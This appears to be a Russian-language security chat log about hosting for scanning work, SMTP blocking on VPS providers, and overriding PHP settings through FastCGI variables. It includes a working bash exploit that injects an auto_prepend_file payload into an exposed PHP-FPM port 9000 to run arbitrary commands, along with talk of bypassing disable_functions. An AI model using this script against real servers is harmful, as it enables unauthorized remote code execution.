B
Я не тестил, все сразу сплойтилось на проектах(
Size: a a a
2020 November 09
z
Не совсем понимаю как можно рулить директивами через fastcgi. Если такое возможно, то почему нельзя редактировать настройки на локальном хосте (нужны права)?
᠌
раз уж про хостеров вопрос подняли - где хостить всякую бело-серую штуку лучше? сидел на scaleway, но они прибили сервы на атомах :(
Vultr не ругается на масскан, норм 3.6ггц процессоры, но трафик лимитный
q
Vultr не ругается на масскан, норм 3.6ггц процессоры, но трафик лимитный
о. посмотрю, пасиба
ES
Vultr не ругается на масскан, норм 3.6ггц процессоры, но трафик лимитный
вультр блокирует исходящий 25 порт, а может и не только его...
WS
вультр блокирует исходящий 25 порт, а может и не только его...
Защита от спама по SMTP?
᠌
вультр блокирует исходящий 25 порт, а может и не только его...
Одно сообщение в саппорт решает вопрос
ES
Одно сообщение в саппорт решает вопрос
я написал, меня попросили предоставить данные о фирме, которую я предоставляю и цель, для которой мне это нужно. я решил не развивать дальше этот вопрос.
᠌
Я просто написал, что для личного использования
ES
Я просто написал, что для личного использования
а чо, так можно было? 🤦♂
AK
Не совсем понимаю как можно рулить директивами через fastcgi. Если такое возможно, то почему нельзя редактировать настройки на локальном хосте (нужны права)?
через переменные PHP_VALUE и PHP_ADMIN_VALUE
ES
ну в остальном вультр хороший, да. есть возможность из iso развернуть свой образ(kali, parrot). но история с блокировкой smtp меня расстроила. еще и не сразу разберешься- чего это оно не работает.
q
ну в остальном вультр хороший, да. есть возможность из iso развернуть свой образ(kali, parrot). но история с блокировкой smtp меня расстроила. еще и не сразу разберешься- чего это оно не работает.
там смтп почти везде зарезан по-умолчанию
в том-же scaleway его нужно отдельно включать
в том-же scaleway его нужно отдельно включать
S
через переменные PHP_VALUE и PHP_ADMIN_VALUE
Какая-то чёрная магия
AK
Какая-то чёрная магия
никакой магии, стандартный механизм fpm, который обрабатывает переменные окружения. Что в нжинксе они через fastcgi_param задаются, что в других
PS
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
Короче получается что добавить в disable_functions можно, а убрать нельзя. Вот тут тоже это обсуждают https://stackoverflow.com/questions/19473132/php-admin-value-disable-functions-not-working, хотя почему не объясняют.
PS
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.
А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:
Или воспользоваться более мощным клиентом, например, таким.
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.
А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
Или воспользоваться более мощным клиентом, например, таким.
Вот тут нашлось: https://www.php.net/manual/en/install.fpm.configuration.php.
Please note that defining disable_functions or disable_classes will not overwrite previously defined php.ini values, but will append the new value instead.
h
а мне сегодня как раз пришло предложение сменить пароль на ржд бонус
S
а мне сегодня как раз пришло предложение сменить пароль на ржд бонус
Их разослали после нашего флуда в соседнем чятике на эту тему
O
а мне сегодня как раз пришло предложение сменить пароль на ржд бонус
Всем вроде обещались